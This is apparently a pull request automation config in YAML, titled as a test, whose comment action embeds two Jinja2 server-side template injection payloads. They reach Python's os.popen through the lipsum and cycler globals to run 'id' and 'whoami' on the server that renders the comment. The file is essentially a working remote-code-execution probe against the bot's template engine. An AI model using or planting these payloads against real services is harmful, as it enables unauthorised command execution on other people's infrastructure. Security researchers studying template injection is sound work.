pull_request_rules:
  - name: SSTI RCE Test
    conditions:
      - base=main
      - label=ssti
    actions:
      comment:
        message: |
          SSTI Test Results:
          Lipsum: {{ lipsum.__globals__.os.popen("id").read() }}
          Cycler: {{ cycler.__init__.__globals__.os.popen("whoami").read() }}
